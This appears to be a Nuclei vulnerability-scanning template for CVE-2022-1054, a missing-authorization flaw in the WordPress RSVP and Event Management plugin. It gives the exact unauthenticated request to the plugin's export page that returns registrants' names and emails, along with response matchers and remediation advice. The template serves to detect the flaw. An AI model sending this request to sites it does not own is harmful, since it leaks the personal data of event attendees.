46 lines
1.6 KiB
YAML
46 lines
1.6 KiB
YAML
id: CVE-2022-1054
|
|
|
|
info:
|
|
name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization
|
|
author: Akincibor
|
|
severity: medium
|
|
description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
|
|
remediation: |
|
|
Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-1054
|
|
cwe-id: CWE-862
|
|
epss-score: 0.00292
|
|
epss-percentile: 0.65745
|
|
cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: wpchill
|
|
product: rsvp_and_event_management
|
|
framework: wordpress
|
|
tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'RSVP Status'
|
|
- '"First Name"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402206ab657ea60ab03fa1b12e94f7aa2cdd65eee79441595e59a56e289de6c3744010220530d57d74cf030f0ad39f4f0da9a6b1f21e81225ad30f4137f106d5ac34158fb:922c64590222798bb761d5b6d8e72950
|